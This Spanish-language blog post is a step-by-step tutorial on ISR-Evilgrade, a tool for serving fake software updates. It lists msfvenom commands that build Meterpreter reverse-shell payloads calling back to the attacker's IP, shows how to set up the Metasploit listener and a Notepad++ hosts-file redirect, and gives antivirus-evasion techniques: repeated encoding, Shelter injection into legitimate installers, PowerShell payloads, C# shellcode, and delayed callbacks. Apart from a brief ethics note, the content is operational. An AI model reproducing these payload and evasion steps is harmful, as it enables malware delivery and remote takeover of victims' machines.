ISR-Evilgrade: Pentesting de Actualizaciones de Software

  

 https://www.onlinetis.com

ISR-Evilgrade: Pentesting de Actualizaciones de Software

ISR-Evilgrade es una herramienta clásica en el mundo del pentesting (pruebas de penetración) diseñada para explotar las debilidades en los procesos de actualización de software.

Aquí tienes un resumen detallado de qué es, cómo funciona y su situación actual en Kali Linux.

¿Qué es ISR-Evilgrade?

Es un framework modular que permite a un atacante inyectar actualizaciones falsas en aplicaciones que no verifican correctamente la autenticidad o integridad de sus paquetes de actualización (por ejemplo, mediante firmas digitales).

  • Objetivo: Engañar al software legítimo para que descargue y ejecute un binario malicioso (agente) en lugar de la actualización real.

  • Mecanismo: Actúa como un servidor web que entrega el "payload" cuando la aplicación consulta si hay actualizaciones.

  • Módulos: Incluye módulos para aplicaciones conocidas (históricamente como Notepad++, WinZip, iTunes, etc.).

Cómo funciona el ataque (Escenario típico)

Para que Evilgrade funcione, el atacante debe estar en una posición donde pueda redirigir el tráfico de la víctima hacia su propia máquina. Generalmente se usa en combinación con:

  1. DNS Spoofing: Rediriges el dominio de actualización (ej. updates.software.com) a la IP de tu máquina con Kali.

  2. Man-in-the-Middle (MitM): Interceptas la conexión para que la víctima crea que está hablando con el servidor oficial.

  3. Ejecución: Evilgrade detecta la petición, sirve el archivo malicioso, y la aplicación de la víctima lo instala.

Uso básico en Kali Linux

Aunque es una herramienta antigua, sigue estando disponible en los repositorios o vía GitHub.

  1. Instalación:

    Bash
    sudo apt update
sudo apt install isr-evilgrade

  2. Iniciar la consola:

    Bash
    evilgrade

  3. Comandos principales:

    • show modules: Lista todos los programas que puedes atacar.

    • set module [nombre]: Selecciona el software objetivo.

    • show options: Ver la configuración (IP del servidor, puerto, ruta del agente).

    • set agent [ruta_al_malware]: Aquí defines el archivo que la víctima descargará (usualmente un ejecutable creado con msfvenom).

    • start: Inicia el servidor de actualizaciones falso.

⚠️ Estado Actual y Advertencia

Es importante que sepas que ISR-Evilgrade ya no es tan efectivo como antes.

Hoy en día, la mayoría del software moderno utiliza HTTPS con validación de certificados y firmas digitales en sus binarios. Si la aplicación intenta descargar una actualización y el certificado no coincide o el archivo no está firmado por el desarrollador original, la actualización fallará.

Nota Ética: Utiliza esta herramienta únicamente en entornos controlados de laboratorio o con permiso explícito. El acceso no autorizado a sistemas es ilegal.


Vamos a preparar un escenario de laboratorio. El objetivo es que entiendas el flujo completo: desde que creas el archivo malicioso (payload) hasta que configuras Evilgrade para entregarlo.

Para este ejemplo, simularemos que la víctima descarga una actualización que, al ejecutarse, nos devuelve una shell reversa (control remoto).

Paso 1: Generar el Payload con Metasploit

Primero, necesitamos el archivo que "engañará" al sistema. Usaremos msfvenom para crear un ejecutable de Windows que se conecte de vuelta a tu IP.

En tu terminal de Kali, escribe:

Bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TU_IP_KALI] LPORT=4444 -f exe -o update.exe

Sustituye [TU_IP_KALI] por tu dirección IP local (puedes verla con ip a).

Paso 2: Configurar el Receptor (Listener)

Necesitamos que Metasploit esté escuchando para recibir la conexión cuando la víctima ejecute el archivo.

  1. Abre una nueva terminal y escribe: msfconsole

  2. Configura el manejador:

    Bash
    use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [TU_IP_KALI]
set LPORT 4444
exploit -j

    (El parámetro -j lo deja corriendo en segundo plano).

Paso 3: Configurar ISR-Evilgrade

Ahora configuramos el servidor de actualizaciones falso para que entregue nuestro update.exe.

  1. Inicia la herramienta: evilgrade

  2. Selecciona un módulo (por ejemplo, el de Notepad++ que es un clásico):

    Bash
    set module notepadplus

  3. Configura el agente (la ruta al archivo que creamos en el Paso 1):

    Bash
    set agent /ruta/a/tu/archivo/update.exe

  4. Inicia el servidor:

    Bash
    start

Paso 4: El eslabón perdido (Redirección DNS)

Para que esto funcione en la vida real, la víctima debe llegar a tu IP cuando busque el servidor de actualizaciones. En un laboratorio, puedes simular esto editando el archivo hosts de la máquina víctima (Windows):

  • Ruta: C:\Windows\System32\drivers\etc\hosts

  • Añade una línea: [TU_IP_KALI] notepad-plus-plus.org

Resumen del flujo

ActorAcción
Atacante (Kali)Ejecuta Evilgrade y espera con Metasploit.
VíctimaAbre Notepad++ y busca actualizaciones.
RedEl DNS redirige la petición a tu Kali en lugar de a la web real.
EvilgradeEntrega tu update.exe camuflado.
ResultadoLa víctima ejecuta la "actualización" y tú obtienes una sesión de Meterpreter.

💡 Nota importante sobre Windows Defender

Si intentas esto en un Windows 10 u 11 moderno, Windows Defender detectará el payload de msfvenom al instante porque su firma es muy conocida. Para un laboratorio exitoso, asegúrate de desactivar el antivirus en la máquina de prueba o intenta usar técnicas de evasión (como codificación o herramientas como Villain o Havoc).


Para que un ataque con ISR-Evilgrade funcione en un entorno moderno, el mayor obstáculo no es la red, sino el Antivirus (AV). Si usas un ejecutable estándar de msfvenom, Windows Defender lo borrará en milisegundos.

Aquí te explico las tres estrategias principales para que tu "actualización" no sea detectada:

1. Encriptación y Ofuscación (Msfvenom Avanzado)

En lugar de un .exe simple, podemos intentar que el código sea más difícil de leer para el AV usando múltiples iteraciones de un "encoder".

  • Comando mejorado:

    Bash
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[TU_IP] LPORT=4444 -e x64/zutto_dekiru -i 10 -f exe -o update_encoded.exe

    • -e: Usa un encoder específico.

    • -i 10: Procesa el archivo 10 veces para cambiar su firma.

    • Nota: Hoy en día, los encoders por sí solos suelen ser insuficientes contra firmas heurísticas.

2. Uso de Frameworks de Evasión (Recomendado)

Existen herramientas diseñadas específicamente para generar payloads que pasan desapercibidos. Dos de las más populares actualmente son:

  • Villain: Crea puertas traseras (backdoors) muy difíciles de detectar que usan protocolos menos comunes.

  • Havoc C2: Es un framework moderno (sustituto de Cobalt Strike en muchos casos) que genera "daemons" que duermen y se despiertan para evitar el análisis de comportamiento del AV.

  • Shelter: Es una herramienta de inyección de código dinámico. Toma un ejecutable legítimo (por ejemplo, el instalador real de Notepad++) e inyecta tu código malicioso dentro de él. El AV ve un archivo firmado y "real", pero tu código corre en segundo plano.

3. "Living off the Land" (Ataques sin archivos)

En lugar de enviar un .exe, puedes configurar Evilgrade para que ejecute un comando de PowerShell o un script de Windows Script Host (.vbs o .js).

El antivirus suele ser más permisivo con scripts de sistema que con archivos ejecutables desconocidos.

  • Puedes generar un payload en formato PowerShell con Metasploit:

    Bash
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[TU_IP] LPORT=4444 -f psh-reflection -o update.ps1

🛠️ Configuración Práctica de Evasión

Si quieres algo que funcione "fuera de la caja" en un laboratorio con Windows Defender activado, te sugiero usar Inyeccion de Shellcode en C#:

  1. Generas el shellcode en formato C# con msfvenom (-f csharp).

  2. Lo compilas en un pequeño programa de C# (puedes usar el compilador csc.exe que viene en Windows).

  3. Ese binario resultante suele tener una tasa de detección mucho menor que los generados automáticamente por Kali.

Un consejo de "Hacker Ético":

La mejor forma de evadir un AV no es esconder el virus, sino hacer que el comportamiento parezca legítimo. Por ejemplo, que el programa se conecte a la IP de Kali solo después de 5 minutos de inactividad del usuario.

Location: España

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Imagen
  www.onlinetis.com   Hacking y ciberseguridad en kali linux con Fping Fping es un programa similar a ping que utiliza la solicitud de eco del Protocolo de Mensajes de Control de Internet (ICMP) para determinar si un host objetivo responde. fping se diferencia de ping en que permite especificar cualquier número de objetivos en la línea de comandos o un archivo con las listas de objetivos a los que se hará ping. En lugar de enviar a un objetivo hasta que se agote el tiempo de espera o responda, fping envía un paquete de ping y pasa al siguiente objetivo mediante un sistema de turnos rotatorios. Como instalar:  sudo apt install fping fping Enviar paquetes ICMP ECHO_REQUEST a los hosts de la red   fping6 Compatibilidad con versiones anteriores de fping anteriores a la versión 4.0 El comando fping en Kali Linux es una utilidad de red que se utiliza para enviar paquetes de ICMP (Protocolo de mensajes de control de Internet) a varios hosts de forma simultánea. A diferen...
LEER MAS »

Hacking y ciberseguridad en kali linux con atk6-thcping6

Imagen
www.onlinetis.com Hacking y ciberseguridad en kali linux con atk6-thcping6 Parece que estás interesado en usar atk6-thcping6 en Kali Linux. Esta herramienta es parte del conjunto de utilidades thc-ipv6 , diseñado para probar las debilidades del protocolo IPv6. Para usar atk6-thcping6 , primero necesitas tener instalado el paquete thc-ipv6 . En la mayoría de las distribuciones de Kali, ya viene preinstalado, pero si no, puedes instalarlo con el siguiente comando: Bash sudo apt install thc-ipv6 Una vez que lo tienes instalado, la sintaxis básica para atk6-thcping6 es: Bash atk6-thcping6 <interface> <target> [opciones] Aquí está el desglose de los argumentos y opciones más comunes: <interface> : La interfaz de red que usarás para enviar el paquete. Por ejemplo, eth0 , wlan0 , etc. <target> : La dirección IPv6 del objetivo al que quieres hacer ping. [opciones] : Puedes usar varias opciones para modificar el comportamiento del ping. La mejor manera de ver todas la...
LEER MAS »

Como utilizar Fierce en kali linux

Imagen
  www.onlinetis.com   Como utilizar Fierce en kali linux Fierce es un escáner semiligero que ayuda a localizar direcciones IP no contiguas y nombres de host en dominios específicos. Está pensado como precursor de nmap, unicornscan, nessus, nikto, etc., ya que todos ellos requieren que se conozca previamente el espacio IP buscado. No realiza exploits ni escanea internet indiscriminadamente. Está diseñado específicamente para localizar objetivos probables tanto dentro como fuera de una red corporativa. Dado que utiliza principalmente DNS, es frecuente encontrar redes mal configuradas que filtran el espacio de direcciones interno. Esto es especialmente útil en malware dirigido. Originalmente escrito por RSnake y otros en http://ha.ckers.org/. Se trata simplemente de una conversión a Python 3 para simplificar y modernizar el código base. Como instalar: sudo apt install fierce Escáner DNS que ayuda a localizar espacios de IP no contiguos y nombres de host contra dominios específico...
LEER MAS »